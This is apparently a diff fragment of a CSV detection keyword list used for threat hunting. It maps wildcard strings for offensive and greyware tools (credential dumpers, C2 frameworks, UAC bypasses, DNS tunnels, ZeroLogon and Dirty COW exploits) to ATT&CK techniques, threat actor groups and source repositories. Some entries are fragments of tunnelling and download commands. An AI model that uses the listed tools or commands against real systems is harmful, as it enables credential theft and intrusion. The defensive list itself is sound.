+"*Invoke-watson*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-WCMDump*","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. 
Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","1","N/A","N/A","8","708","132","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z"
+"*Invoke-WCMDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-WebRequest https://tinyurl.com/*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"*Invoke-WebRequest ifconfig.me/ip*Content.Trim()","greyware_tool_keyword","powershell","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"*Invoke-WebRev.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-Whisker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-WindowsUpdateCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-WinEnum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WinEnum.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-WinEnum.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-WinlogonCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - 
T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-WinlogonCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-winPEAS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-winPEAS*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*invoke-winrmsession*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-WireTap*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-WlanProfilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-WmiCommand *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-WmiCommand*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z"
+"*invoke-wmiexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-WMIExec*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-WMIExec*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - 
T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*invoke-wmijspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*invoke-wmipayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-WmiShadowCopy*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation 
tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z"
+"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-WscriptElevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ZeroLogon*","offensive_tool_keyword","Invoke-ZeroLogon","Zerologon CVE exploitation","T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004","TA0001 - TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-ZeroLogon","1","1","N/A","N/A","3","203","46","2020-10-14T04:42:58Z","2020-09-17T05:01:46Z"
+"*Invoke-Zerologon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoking CreateSvcRpc (by @x86matthew*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z"
+"*io_dirtycow.c*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z"
+"*io_dirtycow.so*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z"
+"*iocnglnmfkgfedpcemdflhkchokkfeii*","greyware_tool_keyword","sVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*iodine -*","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*iodined -*","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*iolonopooapdagdemdoaihahlfkncfgg*","greyware_tool_keyword","Azino VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*iomoath/PowerShx*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
+"*ionide *","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ionided *","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ios7tojohn.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*ip l set dev * address *:*:*","greyware_tool_keyword","ip","changing mac address with ip","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A"
+"*ip link set ligolo up*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ip link set ligolo up*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
+"*ip route add * dev ligolo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ip tuntap add 
user root mode tun ligolo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*IPeerToPeerService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*IPfuscation.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*IPfuscation.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*ipscan 1*.255*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" 
+"*ipscan 10.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 172.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 192.168.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan.exe -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan-win64-*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell 
spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*iptables -t nat -A REDSOCKS*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*IReversePortForwardService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 